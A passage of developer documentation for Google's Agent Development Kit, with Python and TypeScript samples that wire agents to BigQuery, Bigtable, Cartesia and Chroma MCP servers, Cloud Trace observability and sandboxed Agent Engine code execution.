`AI.FORECAST` function. - **`ask_data_insights`**: Answers questions about data in BigQuery tables using natural language. They are packaged in the toolset `BigQueryToolset`. ```py # Copyright 2025 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License.
import asyncio from google.adk.agents import Agent from google.adk.runners import Runner from google.adk.sessions import InMemorySessionService from google.adk.tools.bigquery import BigQueryCredentialsConfig from google.adk.tools.bigquery import BigQueryToolset from google.adk.tools.bigquery.config import BigQueryToolConfig from google.adk.tools.bigquery.config import WriteMode from google.genai import types import google.auth # Define constants for this example agent AGENT_NAME = "bigquery_agent" APP_NAME = "bigquery_app" USER_ID = "user1234" SESSION_ID = "1234" GEMINI_MODEL = "gemini-2.0-flash" # Define a tool configuration to block any write operations tool_config = BigQueryToolConfig(write_mode=WriteMode.BLOCKED) # Use Application Default Credentials (ADC) for BigQuery authentication # https://cloud.google.com/docs/authentication/provide-credentials-adc application_default_credentials, _ = google.auth.default() credentials_config = BigQueryCredentialsConfig( credentials=application_default_credentials ) # Instantiate a BigQuery toolset bigquery_toolset = BigQueryToolset( credentials_config=credentials_config, bigquery_tool_config=tool_config ) # Agent Definition bigquery_agent = Agent( model=GEMINI_MODEL, name=AGENT_NAME, description=( "Agent to answer questions about BigQuery data and models and execute" " SQL queries." ), instruction="""\ You are a data science agent with access to several BigQuery tools. Make use of those tools to answer the user's questions. """, tools=[bigquery_toolset], ) # Session and Runner session_service = InMemorySessionService() session = asyncio.run( session_service.create_session( app_name=APP_NAME, user_id=USER_ID, session_id=SESSION_ID ) ) runner = Runner( agent=bigquery_agent, app_name=APP_NAME, session_service=session_service ) # Agent Interaction def call_agent(query): """ Helper function to call the agent with a query. 
""" content = types.Content(role="user", parts=[types.Part(text=query)]) events = runner.run(user_id=USER_ID, session_id=SESSION_ID, new_message=content) print("USER:", query) for event in events: if event.is_final_response(): final_response = event.content.parts[0].text print("AGENT:", final_response) call_agent("Are there any ml datasets in bigquery-public-data project?") call_agent("Tell me more about ml_datasets.") call_agent("Which all tables does it have?") call_agent("Tell me more about the census_adult_income table.") call_agent("How many rows are there per income bracket?") call_agent( "What is the statistical correlation between education_num, age, and the income_bracket?" ) ``` Note: If you want to access a BigQuery data agent as a tool, see [Data Agents tools for ADK](https://google.github.io/adk-docs/integrations/data-agent/index.md). # Bigtable tool for ADK Supported in ADKPython v1.12.0 These are a set of tools aimed to provide integration with Bigtable, namely: - **`list_instances`**: Fetches Bigtable instances in a Google Cloud project. - **`get_instance_info`**: Fetches metadata instance information in a Google Cloud project. - **`list_tables`**: Fetches tables in a GCP Bigtable instance. - **`get_table_info`**: Fetches metadata table information in a GCP Bigtable. - **`execute_sql`**: Runs a SQL query in Bigtable table and fetch the result. They are packaged in the toolset `BigtableToolset`. ```py # Copyright 2025 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
# See the License for the specific language governing permissions and # limitations under the License. import asyncio from google.adk.agents import Agent from google.adk.runners import Runner from google.adk.sessions import InMemorySessionService from google.adk.tools.google_tool import GoogleTool from google.adk.tools.bigtable import query_tool from google.adk.tools.bigtable.settings import BigtableToolSettings from google.adk.tools.bigtable.bigtable_credentials import BigtableCredentialsConfig from google.adk.tools.bigtable.bigtable_toolset import BigtableToolset from google.genai import types from google.adk.tools.tool_context import ToolContext import google.auth from google.auth.credentials import Credentials # Define constants for this example agent AGENT_NAME = "bigtable_agent" APP_NAME = "bigtable_app" USER_ID = "user1234" SESSION_ID = "1234" GEMINI_MODEL = "gemini-2.5-flash" # Define Bigtable tool config with read capability set to allowed. tool_settings = BigtableToolSettings() # Define a credentials config - in this example we are using application default # credentials # https://cloud.google.com/docs/authentication/provide-credentials-adc application_default_credentials, _ = google.auth.default() credentials_config = BigtableCredentialsConfig( credentials=application_default_credentials ) # Instantiate a Bigtable toolset bigtable_toolset = BigtableToolset( credentials_config=credentials_config, bigtable_tool_settings=tool_settings ) # Optional # Create a wrapped function tool for the agent on top of the built-in # `execute_sql` tool in the bigtable toolset. # For example, this customized tool can perform a dynamically-built query. def count_rows_tool( table_name: str, credentials: Credentials, # GoogleTool handles `credentials` settings: BigtableToolSettings, # GoogleTool handles `settings` tool_context: ToolContext, # GoogleTool handles `tool_context` ): """Counts the total number of rows for a specified table. 
Args: table_name: The name of the table for which to count rows. Returns: The total number of rows in the table. """ # Replace the following settings for a specific bigtable database. PROJECT_ID = "" INSTANCE_ID = "" query = f""" SELECT count(*) FROM {table_name} """ return query_tool.execute_sql( project_id=PROJECT_ID, instance_id=INSTANCE_ID, query=query, credentials=credentials, settings=settings, tool_context=tool_context, ) # Agent Definition bigtable_agent = Agent( model=GEMINI_MODEL, name=AGENT_NAME, description=( "Agent to answer questions about bigtable database and execute SQL queries." ), instruction="""\ You are a data assistant agent with access to several bigtable tools. Make use of those tools to answer the user's questions. """, tools=[ bigtable_toolset, # Add customized bigtable tool based on the built-in bigtable toolset. GoogleTool( func=count_rows_tool, credentials_config=credentials_config, tool_settings=tool_settings, ), ], ) # Session and Runner session_service = InMemorySessionService() session = asyncio.run( session_service.create_session( app_name=APP_NAME, user_id=USER_ID, session_id=SESSION_ID ) ) runner = Runner( agent=bigtable_agent, app_name=APP_NAME, session_service=session_service ) # Agent Interaction def call_agent(query): """ Helper function to call the agent with a query. """ content = types.Content(role="user", parts=[types.Part(text=query)]) events = runner.run(user_id=USER_ID, session_id=SESSION_ID, new_message=content) print("USER:", query) for event in events: if event.is_final_response(): final_response = event.content.parts[0].text print("AGENT:", final_response) # Replace the bigtable instance and table names below with your own. 
call_agent("List all tables in projects//instances/") call_agent("List the top 5 rows in ") ``` # Cartesia MCP tool for ADK Supported in ADK: Python, TypeScript The [Cartesia MCP Server](https://github.com/cartesia-ai/cartesia-mcp) connects your ADK agent to the [Cartesia](https://cartesia.ai/) AI audio platform. This integration gives your agent the ability to generate speech, localize voices across languages, and create audio content using natural language. ## Use cases - **Text-to-Speech Generation**: Convert text into natural-sounding speech using Cartesia's diverse voice library, with control over voice selection and output format. - **Voice Localization**: Transform existing voices into different languages while preserving the original speaker's characteristics, which is ideal for multilingual content creation. - **Audio Infill**: Fill gaps between audio segments to create smooth transitions, useful for podcast editing or audiobook production. - **Voice Transformation**: Convert audio clips to sound like different voices from Cartesia's library.
## Prerequisites - Sign up for a [Cartesia account](https://play.cartesia.ai/sign-in) - Generate an [API key](https://play.cartesia.ai/keys) from the Cartesia playground ## Use with agent ```python from google.adk.agents import Agent from google.adk.tools.mcp_tool import McpToolset from google.adk.tools.mcp_tool.mcp_session_manager import StdioConnectionParams from mcp import StdioServerParameters CARTESIA_API_KEY = "YOUR_CARTESIA_API_KEY" root_agent = Agent( model="gemini-2.5-pro", name="cartesia_agent", instruction="Help users generate speech and work with audio content", tools=[ McpToolset( connection_params=StdioConnectionParams( server_params=StdioServerParameters( command="uvx", args=["cartesia-mcp"], env={ "CARTESIA_API_KEY": CARTESIA_API_KEY, # "OUTPUT_DIRECTORY": "/path/to/output", # Optional } ), timeout=30, ), ) ], ) ``` ```typescript import { LlmAgent, MCPToolset } from "@google/adk"; const CARTESIA_API_KEY = "YOUR_CARTESIA_API_KEY"; const rootAgent = new LlmAgent({ model: "gemini-2.5-pro", name: "cartesia_agent", instruction: "Help users generate speech and work with audio content", tools: [ new MCPToolset({ type: "StdioConnectionParams", serverParams: { command: "uvx", args: ["cartesia-mcp"], env: { CARTESIA_API_KEY: CARTESIA_API_KEY, // OUTPUT_DIRECTORY: "/path/to/output", // Optional }, }, }), ], }); export { rootAgent }; ``` ## Available tools | Tool | Description | | ---------------- | ---------------------------------------------- | | `text_to_speech` | Convert text to audio using a specified voice | | `list_voices` | List all available Cartesia voices | | `get_voice` | Get details about a specific voice | | `clone_voice` | Clone a voice from audio samples | | `update_voice` | Update an existing voice | | `delete_voice` | Delete a voice from your library | | `localize_voice` | Transform a voice into a different language | | `voice_change` | Convert an audio file to use a different voice | | `infill` | Fill gaps between audio segments | ## 
Configuration The Cartesia MCP server can be configured using environment variables: | Variable | Description | Required | | ------------------ | ---------------------------------------- | -------- | | `CARTESIA_API_KEY` | Your Cartesia API key | Yes | | `OUTPUT_DIRECTORY` | Directory to store generated audio files | No | ## Additional resources - [Cartesia MCP Server Repository](https://github.com/cartesia-ai/cartesia-mcp) - [Cartesia MCP Documentation](https://docs.cartesia.ai/integrations/mcp) - [Cartesia Playground](https://play.cartesia.ai/) # Chroma MCP tool for ADK Supported in ADK: Python, TypeScript The [Chroma MCP Server](https://github.com/chroma-core/chroma-mcp) connects your ADK agent to [Chroma](https://www.trychroma.com/), an open-source embedding database. This integration gives your agent the ability to create collections, store documents, and retrieve information using semantic search, full text search, and metadata filtering. ## Use cases - **Semantic Memory for Agents**: Store conversation context, facts, or learned information that agents can retrieve later using natural language queries. - **Knowledge Base Retrieval**: Build a retrieval-augmented generation (RAG) system by storing documents and retrieving relevant context for responses. - **Persistent Context Across Sessions**: Maintain long-term memory across conversations, allowing agents to reference past interactions and accumulated knowledge.
## Prerequisites - **For local storage**: A directory path to persist data - **For Chroma Cloud**: A [Chroma Cloud](https://www.trychroma.com/) account with tenant ID, database name, and API key ## Use with agent ```python from google.adk.agents import Agent from google.adk.tools.mcp_tool import McpToolset from google.adk.tools.mcp_tool.mcp_session_manager import StdioConnectionParams from mcp import StdioServerParameters # For local storage, use: DATA_DIR = "/path/to/your/data/directory" # For Chroma Cloud, use: # CHROMA_TENANT = "your-tenant-id" # CHROMA_DATABASE = "your-database-name" # CHROMA_API_KEY = "your-api-key" root_agent = Agent( model="gemini-2.5-pro", name="chroma_agent", instruction="Help users store and retrieve information using semantic search", tools=[ McpToolset( connection_params=StdioConnectionParams( server_params=StdioServerParameters( command="uvx", args=[ "chroma-mcp", # For local storage, use: "--client-type", "persistent", "--data-dir", DATA_DIR, # For Chroma Cloud, use: # "--client-type", # "cloud", # "--tenant", # CHROMA_TENANT, # "--database", # CHROMA_DATABASE, # "--api-key", # CHROMA_API_KEY, ], ), timeout=30, ), ) ], ) ``` ```typescript import { LlmAgent, MCPToolset } from "@google/adk"; // For local storage, use: const DATA_DIR = "/path/to/your/data/directory"; // For Chroma Cloud, use: // const CHROMA_TENANT = "your-tenant-id"; // const CHROMA_DATABASE = "your-database-name"; // const CHROMA_API_KEY = "your-api-key"; const rootAgent = new LlmAgent({ model: "gemini-2.5-pro", name: "chroma_agent", instruction: "Help users store and retrieve information using semantic search", tools: [ new MCPToolset({ type: "StdioConnectionParams", serverParams: { command: "uvx", args: [ "chroma-mcp", // For local storage, use: "--client-type", "persistent", "--data-dir", DATA_DIR, // For Chroma Cloud, use: // "--client-type", // "cloud", // "--tenant", // CHROMA_TENANT, // "--database", // CHROMA_DATABASE, // "--api-key", // CHROMA_API_KEY, ], }, 
}), ], }); export { rootAgent }; ``` ## Available tools ### Collection management | Tool | Description | | ----------------------------- | -------------------------------------------------------- | | `chroma_list_collections` | List all collections with pagination support | | `chroma_create_collection` | Create a new collection with optional HNSW configuration | | `chroma_get_collection_info` | Get detailed information about a collection | | `chroma_get_collection_count` | Get the number of documents in a collection | | `chroma_modify_collection` | Update a collection's name or metadata | | `chroma_delete_collection` | Delete a collection | | `chroma_peek_collection` | View a sample of documents in a collection | ### Document operations | Tool | Description | | ------------------------- | ------------------------------------------------------------- | | `chroma_add_documents` | Add documents with optional metadata and custom IDs | | `chroma_query_documents` | Query documents using semantic search with advanced filtering | | `chroma_get_documents` | Retrieve documents by IDs or filters with pagination | | `chroma_update_documents` | Update existing documents' content, metadata, or embeddings | | `chroma_delete_documents` | Delete specific documents from a collection | ## Configuration The Chroma MCP server supports multiple client types to suit different needs: ### Client types | Client Type | Description | Key Arguments | | ------------ | ---------------------------------------------------------- | -------------------------------------------------------- | | `ephemeral` | In-memory storage, cleared on restart. Useful for testing. 
| None (default) | | `persistent` | File-based storage on your local machine | `--data-dir` | | `http` | Connect to a self-hosted Chroma server | `--host`, `--port`, `--ssl`, `--custom-auth-credentials` | | `cloud` | Connect to Chroma Cloud (api.trychroma.com) | `--tenant`, `--database`, `--api-key` | ### Environment variables You can also configure the client using environment variables. Command-line arguments take precedence over environment variables. | Variable | Description | | -------------------- | ---------------------------------------------------------- | | `CHROMA_CLIENT_TYPE` | Client type: `ephemeral`, `persistent`, `http`, or `cloud` | | `CHROMA_DATA_DIR` | Path for persistent local storage | | `CHROMA_TENANT` | Tenant ID for Chroma Cloud | | `CHROMA_DATABASE` | Database name for Chroma Cloud | | `CHROMA_API_KEY` | API key for Chroma Cloud | | `CHROMA_HOST` | Host for self-hosted HTTP client | | `CHROMA_PORT` | Port for self-hosted HTTP client | | `CHROMA_SSL` | Enable SSL for HTTP client (`true` or `false`) | | `CHROMA_DOTENV_PATH` | Path to `.env` file (defaults to `.chroma_env`) | ## Additional resources - [Chroma MCP Server Repository](https://github.com/chroma-core/chroma-mcp) - [Chroma Documentation](https://docs.trychroma.com/) - [Chroma Cloud](https://www.trychroma.com/) # Google Cloud Trace observability for ADK Supported in ADK: Python With ADK, you can already inspect and observe your agent interactions locally using the web development UI described in the [trace view documentation](https://google.github.io/adk-docs/evaluate/#debugging-with-the-trace-view). For cloud deployments, however, you need a centralized dashboard to observe real traffic. Cloud Trace is a component of Google Cloud Observability. It is a tool for monitoring, debugging, and improving the performance of your applications through distributed tracing.
For Agent Development Kit (ADK) applications, Cloud Trace enables comprehensive tracing, helping you understand how requests flow through your agent's interactions and identify performance bottlenecks or errors within your AI agents. ## Overview Cloud Trace is built on [OpenTelemetry](https://opentelemetry.io/), an open-source standard that supports many languages and ingestion methods for generating trace data. This aligns with observability practices for ADK applications, which also use OpenTelemetry-compatible instrumentation, allowing you to: - Trace agent interactions: Cloud Trace continuously gathers and analyzes trace data from your project, enabling you to rapidly diagnose latency issues and errors within your ADK applications. This automatic data collection simplifies the process of identifying problems in complex agent workflows. - Debug issues: Quickly diagnose latency issues and errors by analyzing detailed traces. This is crucial for understanding issues that manifest as increased communication latency across different services or during specific agent actions like tool calls. - Analyze and visualize in depth: Trace Explorer is the primary tool for analyzing traces, offering visual aids like heatmaps for span duration and line charts for request/error rates.
It also provides a spans table, groupable by service and operation, which gives one-click access to representative traces and a waterfall view to easily identify bottlenecks and sources of errors within your agent's execution path. The examples below assume the following agent directory structure: ```text working_dir/ ├── weather_agent/ │ ├── agent.py │ └── __init__.py ├── deploy_agent_engine.py ├── deploy_fast_api_app.py └── agent_runner.py ``` ```python # weather_agent/agent.py import os from google.adk.agents import Agent os.environ.setdefault("GOOGLE_CLOUD_PROJECT", "{your-project-id}") os.environ.setdefault("GOOGLE_CLOUD_LOCATION", "global") os.environ.setdefault("GOOGLE_GENAI_USE_VERTEXAI", "True") # Define a tool function def get_weather(city: str) -> dict: """Retrieves the current weather report for a specified city. Args: city (str): The name of the city for which to retrieve the weather report. Returns: dict: status and result or error msg. """ if city.lower() == "new york": return { "status": "success", "report": ( "The weather in New York is sunny with a temperature of 25 degrees" " Celsius (77 degrees Fahrenheit)." ), } else: return { "status": "error", "error_message": f"Weather information for '{city}' is not available.", } # Create an agent with tools root_agent = Agent( name="weather_agent", model="gemini-2.5-flash", description="Agent to answer questions using weather tools.", instruction="You must use the available tools to find an answer.", tools=[get_weather], ) ``` ## Cloud Trace Setup ### Setup for Agent Engine Deployment #### Agent Engine Deployment - from ADK CLI You can enable cloud tracing by adding the `--trace_to_cloud` flag when deploying your agent to Agent Engine with the `adk deploy agent_engine` command.
```bash adk deploy agent_engine \ --project=$GOOGLE_CLOUD_PROJECT \ --region=$GOOGLE_CLOUD_LOCATION \ --staging_bucket=$STAGING_BUCKET \ --trace_to_cloud \ $AGENT_PATH ``` #### Agent Engine Deployment - from Python SDK If you prefer using the Python SDK, you can enable cloud tracing by passing `enable_tracing=True` when initializing the `AdkApp` object. ```python # deploy_agent_engine.py from vertexai.preview import reasoning_engines from vertexai import agent_engines from weather_agent.agent import root_agent import vertexai PROJECT_ID = "{your-project-id}" LOCATION = "{your-preferred-location}" STAGING_BUCKET = "{your-staging-bucket}" vertexai.init( project=PROJECT_ID, location=LOCATION, staging_bucket=STAGING_BUCKET, ) adk_app = reasoning_engines.AdkApp( agent=root_agent, enable_tracing=True, ) remote_app = agent_engines.create( agent_engine=adk_app, extra_packages=[ "./weather_agent", ], requirements=[ "google-cloud-aiplatform[adk,agent_engines]", ], ) ``` ### Setup for Cloud Run Deployment #### Cloud Run Deployment - from ADK CLI You can enable cloud tracing by adding the `--trace_to_cloud` flag when deploying your agent to Cloud Run with the `adk deploy cloud_run` command.
```bash
adk deploy cloud_run \
    --project=$GOOGLE_CLOUD_PROJECT \
    --region=$GOOGLE_CLOUD_LOCATION \
    --trace_to_cloud \
    $AGENT_PATH
```

If you want to enable Cloud Trace while using a customized agent service deployment on Cloud Run, refer to the [Setup for Customized Deployment](#setup-for-customized-deployment) section below.

### Setup for Customized Deployment

#### From Built-in `get_fast_api_app` Module

If you want to customize your own agent service, you can enable Cloud Trace by initializing the FastAPI app with the built-in `get_fast_api_app` function and setting `trace_to_cloud=True`.

```python
# deploy_fast_api_app.py

import os
from google.adk.cli.fast_api import get_fast_api_app
from fastapi import FastAPI

# Set GOOGLE_CLOUD_PROJECT environment variable for cloud tracing
os.environ.setdefault("GOOGLE_CLOUD_PROJECT", "{your-project-id}")

# Discover the `weather_agent` directory in current working dir
AGENT_DIR = os.path.dirname(os.path.abspath(__file__))

# Create FastAPI app with enabled cloud tracing
app: FastAPI = get_fast_api_app(
    agents_dir=AGENT_DIR,
    web=True,
    trace_to_cloud=True,
)

app.title = "weather-agent"
app.description = "API for interacting with the Agent weather-agent"


# Main execution
if __name__ == "__main__":
    import uvicorn

    uvicorn.run(app, host="0.0.0.0", port=8080)
```

#### From Customized Agent Runner

If you want to fully customize your ADK agent runtime, you can enable Cloud Trace by using the `CloudTraceSpanExporter` class from OpenTelemetry.
```python
# agent_runner.py

from google.adk.runners import Runner
from google.adk.sessions import InMemorySessionService
from weather_agent.agent import root_agent as weather_agent
from google.genai.types import Content, Part
from opentelemetry import trace
from opentelemetry.exporter.cloud_trace import CloudTraceSpanExporter
from opentelemetry.sdk.trace import export
from opentelemetry.sdk.trace import TracerProvider

APP_NAME = "weather_agent"
USER_ID = "u_123"
SESSION_ID = "s_123"

# Register a tracer provider that exports spans to Cloud Trace in batches
provider = TracerProvider()
processor = export.BatchSpanProcessor(
    CloudTraceSpanExporter(project_id="{your-project-id}")
)
provider.add_span_processor(processor)
trace.set_tracer_provider(provider)

session_service = InMemorySessionService()
runner = Runner(agent=weather_agent, app_name=APP_NAME, session_service=session_service)


async def main():
    # Reuse the session if it exists, otherwise create it
    session = await session_service.get_session(
        app_name=APP_NAME, user_id=USER_ID, session_id=SESSION_ID
    )
    if session is None:
        session = await session_service.create_session(
            app_name=APP_NAME, user_id=USER_ID, session_id=SESSION_ID
        )

    user_content = Content(
        role="user", parts=[Part(text="what's weather in paris?")]
    )

    final_response_content = "No response"
    async for event in runner.run_async(
        user_id=USER_ID, session_id=SESSION_ID, new_message=user_content
    ):
        if event.is_final_response() and event.content and event.content.parts:
            final_response_content = event.content.parts[0].text

    print(final_response_content)


if __name__ == "__main__":
    import asyncio

    asyncio.run(main())
```

## Inspect Cloud Traces

After setup is complete, the agent automatically sends trace data to Cloud Trace whenever you interact with it. To inspect the traces, go to [console.cloud.google.com](https://console.cloud.google.com) and open the Trace Explorer for the configured Google Cloud project.

There you will see all available traces produced by the ADK agent, organized under span names such as `invocation`, `agent_run`,
`call_llm`, and `execute_tool`. If you click one of the traces, you will see a waterfall view of the detailed process, similar to what the web development UI shows when you run the `adk web` command.

## Resources

- [Google Cloud Trace Documentation](https://cloud.google.com/trace)

# Agent Engine Code Execution tool for ADK

Supported in ADK: Python v1.17.0 (Preview)

The Agent Engine Code Execution ADK Tool provides a low-latency, highly efficient method for running AI-generated code using the [Google Cloud Agent Engine](https://cloud.google.com/vertex-ai/generative-ai/docs/agent-engine/overview) service. This tool is designed for fast execution, tailored for agentic workflows, and uses sandboxed environments for improved security. The Code Execution tool allows code and data to persist over multiple requests, enabling complex, multi-step coding tasks, including:

- **Code development and debugging:** Create agent tasks that test and iterate on versions of code over multiple requests.
- **Code with data analysis:** Upload data files up to 100MB, and run multiple code-based analyses without the need to reload data for each code run.

This code execution tool is part of the Agent Engine suite; however, you do not have to deploy your agent to Agent Engine to use it. You can run your agent locally or with other services and still use this tool. For more information about the Code Execution feature in Agent Engine, see the [Agent Engine Code Execution](https://cloud.google.com/vertex-ai/generative-ai/docs/agent-engine/code-execution/overview) documentation.

**Preview release:** The Agent Engine Code Execution feature is a Preview release. For more information, see the [launch stage descriptions](https://cloud.google.com/products#product-launch-stages).

## Use the Tool

Before you can use the Agent Engine Code Execution tool with an ADK agent, you must create a sandbox environment with Google Cloud Agent Engine.

To use the Code Execution tool with your ADK agent:

1. Follow the instructions in the Agent Engine [Code Execution quickstart](https://cloud.google.com/vertex-ai/generative-ai/docs/agent-engine/code-execution/quickstart) to create a code execution sandbox environment.
1. Create an ADK agent with settings to access the Google Cloud project where you created the sandbox environment.
1. Configure the agent to use the Code Executor tool, as shown in the following code example. Replace `SANDBOX_RESOURCE_NAME` with the resource name of the sandbox environment you created.

```python
from google.adk.agents.llm_agent import Agent
from google.adk.code_executors.agent_engine_sandbox_code_executor import AgentEngineSandboxCodeExecutor

root_agent = Agent(
    model="gemini-2.5-flash",
    name="agent_engine_code_execution_agent",
    instruction="You are a helpful agent that can write and execute code to answer questions and solve problems.",
    code_executor=AgentEngineSandboxCodeExecutor(
        sandbox_resource_name="SANDBOX_RESOURCE_NAME",
    ),
)
```

For details on the expected format of the `sandbox_resource_name` value, and the alternative `agent_engine_resource_name` parameter, see [Configuration parameters](#config-parameters). For a more advanced example, including recommended system instructions for the tool, see the [Advanced example](#advanced-example) or the full [agent code example](https://github.com/google/adk-python/tree/main/contributing/samples/agent_engine_code_execution).

## How it works

The `AgentEngineSandboxCodeExecutor` tool maintains a single sandbox throughout an agent's task, meaning the sandbox's state persists across all operations within an ADK workflow session.

1. **Sandbox creation:** For multi-step tasks requiring code execution, Agent Engine creates a sandbox with the specified language and machine configurations, isolating the code execution environment. If no sandbox is pre-created, the code execution tool automatically creates one using default settings.
1. **Code execution with persistence:** AI-generated code for a tool call is streamed to the sandbox and then executed within the isolated environment. After execution, the sandbox *remains active* for subsequent tool calls within the same session, preserving variables, imported modules, and file state for the next tool call from the same agent.
1. **Result retrieval:** Standard output and any captured error streams are collected and passed back to the calling agent.
1. **Sandbox clean up:** Once the agent task or conversation concludes, the agent can explicitly delete the sandbox, or rely on the TTL that was specified when the sandbox was created.

## Key benefits

- **Persistent state:** Solve complex tasks where data manipulation or variable context must carry over between multiple tool calls.
- **Targeted Isolation:** Provides robust process-level isolation, ensuring that tool code execution is safe while remaining lightweight.
- **Agent Engine integration:** Tightly integrated into the Agent Engine tool-use and orchestration layer.
- **Low-latency performance:** Designed for speed, allowing agents to execute complex tool-use workflows efficiently without significant overhead.
- **Flexible compute configurations:** Create sandboxes with specific programming language, processing power, and memory configurations.

## System requirements

The following requirements must be met to use the Agent Engine Code Execution tool with your ADK agents:

- A Google Cloud project with the Vertex AI API enabled
- The agent's service account requires the **roles/aiplatform.user** role, which allows it to:
  - Create, get, list, and delete code execution sandboxes
  - Execute code in a code execution sandbox

## Configuration parameters

The Agent Engine Code Execution tool has the following parameters. You must set one of the following resource parameters:

- **`sandbox_resource_name`**: The resource path of an existing sandbox environment that the tool uses for each tool call. The expected string format is as follows:

  ```text
  projects/{$PROJECT_ID}/locations/{$LOCATION_ID}/reasoningEngines/{$REASONING_ENGINE_ID}/sandboxEnvironments/{$SANDBOX_ENVIRONMENT_ID}

  # Example:
  projects/my-vertex-agent-project/locations/us-central1/reasoningEngines/6842888880301111172/sandboxEnvironments/6545148888889161728
  ```

- **`agent_engine_resource_name`**: The Agent Engine resource name under which the tool creates a sandbox environment. The expected string format is as follows:

  ```text
  projects/{$PROJECT_ID}/locations/{$LOCATION_ID}/reasoningEngines/{$REASONING_ENGINE_ID}

  # Example:
  projects/my-vertex-agent-project/locations/us-central1/reasoningEngines/6842888880301111172
  ```

You can use the Google Cloud Agent Engine API to configure Agent Engine sandbox environments separately, using a Google Cloud client connection. The configurable settings include:

- **Programming languages**, including Python and JavaScript
- **Compute environment**, including CPU and memory sizes

For more information on connecting to Google Cloud Agent Engine and configuring sandbox environments, see the Agent Engine [Code Execution quickstart](https://cloud.google.com/vertex-ai/generative-ai/docs/agent-engine/code-execution/quickstart#create_a_sandbox).

## Advanced example

The following example code shows how to use the Code Executor tool in an ADK agent. This example includes a `base_system_instruction` clause to set the operating guidelines for code execution. This instruction clause is optional, but strongly recommended for getting the best results from this tool.
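Before running the example, it can help to confirm that the resource name you plan to pass matches one of the formats listed under Configuration parameters, since an unreplaced placeholder such as `SANDBOX_RESOURCE_NAME` would otherwise only surface as an error once the agent runs. The following is a minimal sketch using only the Python standard library. The helper `classify_resource_name` and both regular expressions are hypothetical and not part of ADK, and they assume that no ID segment contains a `/`.

```python
import re

# Patterns mirror the documented string formats. These names are hypothetical
# helpers for illustration and are not provided by ADK.
_AGENT_ENGINE_RE = re.compile(
    r"^projects/(?P<project>[^/]+)/locations/(?P<location>[^/]+)"
    r"/reasoningEngines/(?P<engine>[^/]+)$"
)
_SANDBOX_RE = re.compile(
    r"^projects/(?P<project>[^/]+)/locations/(?P<location>[^/]+)"
    r"/reasoningEngines/(?P<engine>[^/]+)"
    r"/sandboxEnvironments/(?P<sandbox>[^/]+)$"
)


def classify_resource_name(name: str) -> tuple[str, dict[str, str]]:
    """Return the executor parameter a resource name fits, plus its parts.

    Raises ValueError when the name matches neither documented format.
    """
    for parameter, pattern in (
        ("sandbox_resource_name", _SANDBOX_RE),
        ("agent_engine_resource_name", _AGENT_ENGINE_RE),
    ):
        match = pattern.match(name)
        if match:
            return parameter, match.groupdict()
    raise ValueError(f"Unrecognized resource name: {name!r}")


if __name__ == "__main__":
    parameter, parts = classify_resource_name(
        "projects/my-vertex-agent-project/locations/us-central1"
        "/reasoningEngines/6842888880301111172"
        "/sandboxEnvironments/6545148888889161728"
    )
    print(parameter, parts["sandbox"])
```

The returned parameter name indicates which keyword argument of `AgentEngineSandboxCodeExecutor` the string is suited for. This check covers the string format only; it does not confirm that the resource exists. The advanced agent example itself follows.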
````python
from google.adk.agents.llm_agent import Agent
from google.adk.code_executors.agent_engine_sandbox_code_executor import AgentEngineSandboxCodeExecutor


def base_system_instruction():
    """Returns: data science agent system instruction."""

    return """
    # Guidelines

    **Objective:** Assist the user in achieving their data analysis goals, **with emphasis on avoiding assumptions and ensuring accuracy.** Reaching that goal can involve multiple steps. When you need to generate code, you **don't** need to solve the goal in one go. Only generate the next step at a time.

    **Code Execution:** All code snippets provided will be executed within the sandbox environment.

    **Statefulness:** All code snippets are executed and the variables stay in the environment. You NEVER need to re-initialize variables. You NEVER need to reload files. You NEVER need to re-import libraries.

    **Output Visibility:** Always print the output of code execution to visualize results, especially for data exploration and analysis. For example:
      - To look at the shape of a pandas.DataFrame do:
        ```tool_code
        print(df.shape)
        ```
        The output will be presented to you as:
        ```tool_outputs
        (49, 7)
        ```
      - To display the result of a numerical computation:
        ```tool_code
        x = 10 ** 9 - 12 ** 5
        print(f'{{x=}}')
        ```
        The output will be presented to you as:
        ```tool_outputs
        x=999751168
        ```
      - You **never** generate ```tool_outputs yourself.
      - You can then use this output to decide on next steps.
      - Print just variables (e.g., `print(f'{{variable=}}')`).

    **No Assumptions:** **Crucially, avoid making assumptions about the nature of the data or column names.** Base findings solely on the data itself. Always use the information obtained from `explore_df` to guide your analysis.

    **Available files:** Only use the files that are available as specified in the list of available files.

    **Data in prompt:** Some queries contain the input data directly in the prompt. You have to parse that data into a pandas DataFrame. ALWAYS parse all the data. NEVER edit the data that are given to you.

    **Answerability:** Some queries may not be answerable with the available data. In those cases, inform the user why you cannot process their query and suggest what type of data would be needed to fulfill their request.
    """


root_agent = Agent(
    model="gemini-2.5-flash",
    name="agent_engine_code_execution_agent",
    instruction=base_system_instruction() + """

    You need to assist the user with their queries by looking at the data and the context in the conversation.
    Your final answer should summarize the code and code execution relevant to the user query.

    You should include all pieces of data to answer the user query, such as the table from code execution results.
    If you cannot answer the question directly, you should follow the guidelines above to generate the next step.
    If the question can be answered directly without writing any code, you should do that.
    If you don't have enough data to answer the question, you should ask for clarification from the user.

    You should NEVER install any package on your own like `pip install ...`.
    When plotting trends, you should make sure to sort and order the data by the x-axis.
    """,
    code_executor=AgentEngineSandboxCodeExecutor(
        # Replace with your sandbox resource name if you already have one.
        sandbox_resource_name="SANDBOX_RESOURCE_NAME",
        # Replace with agent engine resource name used for creating sandbox if
        # sandbox_resource_name is not set:
        # agent_engine_resource_name="AGENT_ENGINE_RESOURCE_NAME",
    ),
)
````

For a complete version of an ADK agent using this example code, see the [agent_engine_code_execution sample](https://github.com/google/adk-python/tree/main/contributing/samples/agent_engine_code_execution).

# Gemini API Code Execution tool for ADK

Supported in ADK: Python v0.1.0, Java v0.2.0

The `built_in_code_execution` tool enables the agent to execute code, specifically when using Gemini 2 and higher models.
